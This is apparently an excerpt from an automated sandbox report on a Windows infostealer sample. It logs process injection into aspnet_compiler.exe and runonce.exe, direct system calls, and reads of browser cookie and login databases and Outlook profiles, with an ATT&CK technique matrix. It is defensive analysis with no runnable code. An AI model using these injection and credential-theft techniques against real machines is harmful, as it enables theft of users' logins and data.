                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C5ED mov eax, dword ptr fs:[00000030h]4_2_0179C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C5ED mov eax, dword ptr fs:[00000030h]4_2_0179C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017625E0 mov eax, dword ptr fs:[00000030h]4_2_017625E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017665D0 mov eax, dword ptr fs:[00000030h]4_2_017665D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A5D0 mov eax, dword ptr fs:[00000030h]4_2_0179A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A5D0 mov eax, dword ptr fs:[00000030h]4_2_0179A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E5CF mov eax, dword ptr fs:[00000030h]4_2_0179E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E5CF mov eax, dword ptr fs:[00000030h]4_2_0179E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017845B1 mov eax, dword ptr fs:[00000030h]4_2_017845B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017845B1 mov eax, dword ptr fs:[00000030h]4_2_017845B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E05A7 mov eax, dword ptr fs:[00000030h]4_2_017E05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E05A7 mov eax, dword ptr fs:[00000030h]4_2_017E05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E05A7 mov eax, dword ptr fs:[00000030h]4_2_017E05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E59C mov eax, dword ptr fs:[00000030h]4_2_0179E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01794588 mov eax, dword ptr fs:[00000030h]4_2_01794588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01762582 mov eax, dword ptr fs:[00000030h]4_2_01762582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01762582 mov ecx, dword ptr fs:[00000030h]4_2_01762582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178A470 mov eax, dword ptr fs:[00000030h]4_2_0178A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178A470 mov eax, dword ptr fs:[00000030h]4_2_0178A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178A470 mov eax, dword ptr fs:[00000030h]4_2_0178A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181A49A mov eax, dword ptr fs:[00000030h]4_2_0181A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EC460 mov ecx, dword ptr fs:[00000030h]4_2_017EC460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178245A mov eax, dword ptr fs:[00000030h]4_2_0178245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175645D mov eax, dword ptr fs:[00000030h]4_2_0175645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766A50 mov eax, dword ptr fs:[00000030h]4_2_01766A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770A5B mov eax, dword ptr fs:[00000030h]4_2_01770A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770A5B mov eax, dword ptr fs:[00000030h]4_2_01770A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179CA38 mov eax, dword ptr fs:[00000030h]4_2_0179CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01784A35 mov eax, dword ptr fs:[00000030h]4_2_01784A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01784A35 mov eax, dword ptr fs:[00000030h]4_2_01784A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178EA2E mov eax, dword ptr fs:[00000030h]4_2_0178EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179CA24 mov eax, dword ptr fs:[00000030h]4_2_0179CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017ECA11 mov eax, dword ptr fs:[00000030h]4_2_017ECA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179AAEE mov eax, dword ptr fs:[00000030h]4_2_0179AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179AAEE mov eax, dword ptr fs:[00000030h]4_2_0179AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01760AD0 mov eax, dword ptr fs:[00000030h]4_2_01760AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01794AD0 mov eax, dword ptr fs:[00000030h]4_2_01794AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01794AD0 mov eax, dword ptr fs:[00000030h]4_2_01794AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B6ACC mov eax, dword ptr fs:[00000030h]4_2_017B6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B6ACC mov eax, dword ptr fs:[00000030h]4_2_017B6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B6ACC mov eax, dword ptr fs:[00000030h]4_2_017B6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768AA0 mov eax, dword ptr fs:[00000030h]4_2_01768AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768AA0 mov eax, dword ptr fs:[00000030h]4_2_01768AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B6AA4 mov eax, dword ptr fs:[00000030h]4_2_017B6AA4
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\uI1A364y2P.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: NULL target: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe protection: read write
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\runonce.exe Thread register set: target process: 3452
                Source: C:\Windows\SysWOW64\runonce.exe Thread APC queued: target process: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: FA6008
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
                Source: C:\Windows\SysWOW64\runonce.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: zk0NoejtsplNyT.exe, 00000006.00000002.2622298245.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000000.1805960431.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000000.1965752200.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: zk0NoejtsplNyT.exe, 00000006.00000002.2622298245.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000000.1805960431.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000000.1965752200.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: zk0NoejtsplNyT.exe, 00000006.00000002.2622298245.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000000.1805960431.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000000.1965752200.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
                Source: zk0NoejtsplNyT.exe, 00000006.00000002.2622298245.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000000.1805960431.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000000.1965752200.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Queries volume information: C:\Users\user\Desktop\uI1A364y2P.exe VolumeInformation
                Source: C:\Users\user\Desktop\uI1A364y2P.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.2622738562.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.2621242417.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2622801830.0000000003C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\runonce.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\runonce.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.2622738562.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.2621242417.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2622801830.0000000003C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 612 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 612 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
